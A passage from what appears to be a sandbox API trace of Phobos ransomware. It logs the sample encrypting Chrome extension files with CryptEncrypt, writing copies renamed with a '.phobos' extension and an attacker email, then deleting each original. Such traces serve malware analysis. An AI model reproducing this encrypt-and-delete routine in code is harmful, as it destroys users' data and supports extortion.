lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc878, lpOverlapped=0x0) returned 1 [0162.775] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc880, dwBufLen=0xc880 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc880) returned 1 [0162.776] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc880, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc880, lpOverlapped=0x0) returned 1 [0162.777] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0162.777] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.777] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0162.777] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.777] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0162.777] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.777] CloseHandle (hObject=0x194) returned 1 [0162.777] CloseHandle (hObject=0x138) returned 1 [0162.777] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js")) returned 1 [0162.779] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0162.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0162.779] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=14504) returned 1 [0162.779] CloseHandle (hObject=0x138) returned 1 [0162.779] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html")) returned 0x2020 [0162.779] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0162.779] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.779] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0162.780] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0162.780] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.780] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x38a8, lpOverlapped=0x0) returned 1 [0162.810] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x38b0, dwBufLen=0x38b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x38b0) returned 1 [0162.810] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x38b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x38b0, lpOverlapped=0x0) returned 1 [0162.813] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0162.813] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.813] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0162.813] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.813] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0162.813] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.813] CloseHandle (hObject=0x138) returned 1 [0162.813] CloseHandle (hObject=0x194) returned 1 [0162.813] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html")) returned 1 [0162.814] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0162.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0162.815] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=286777) returned 1 [0162.815] CloseHandle (hObject=0x194) returned 1 [0162.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css")) returned 0x2020 [0162.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0162.815] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.815] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0162.815] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0162.815] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.815] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x46039, lpOverlapped=0x0) returned 1 [0162.832] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x46040, dwBufLen=0x46040 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x46040) returned 1 [0162.834] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x46040, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x46040, lpOverlapped=0x0) returned 1 [0162.843] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0162.843] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.843] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0162.843] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.843] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0162.843] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.843] CloseHandle (hObject=0x194) returned 1 [0162.843] CloseHandle (hObject=0x138) returned 1 [0162.843] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css")) returned 1 [0162.846] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0162.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0162.847] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=31795) returned 1 [0162.847] CloseHandle (hObject=0x138) returned 1 [0162.847] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js")) returned 0x2020 [0162.847] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0162.847] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.847] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0162.848] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0162.848] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.848] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7c33, lpOverlapped=0x0) returned 1 [0162.880] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7c40, dwBufLen=0x7c40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7c40) returned 1 [0162.880] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7c40, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7c40, lpOverlapped=0x0) returned 1 [0162.966] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0162.966] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.966] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0162.966] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.966] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0162.966] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.966] CloseHandle (hObject=0x138) returned 1 [0162.966] CloseHandle (hObject=0x194) returned 1 [0162.966] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js")) returned 1 [0162.968] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0162.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0162.968] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2369) returned 1 [0162.968] CloseHandle (hObject=0x194) returned 1 [0162.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js")) returned 0x2020 [0162.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0162.969] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.969] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0162.969] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0162.969] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.969] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x941, lpOverlapped=0x0) returned 1 [0163.077] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x950, dwBufLen=0x950 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x950) returned 1 [0163.077] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x950, lpOverlapped=0x0) returned 1 [0163.078] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0163.078] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0163.078] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0163.078] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.078] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0163.078] CryptDestroyKey (hKey=0xa327e8) returned 1 [0163.078] CloseHandle (hObject=0x194) returned 1 [0163.078] CloseHandle (hObject=0x138) returned 1 [0163.078] DeleteFileW 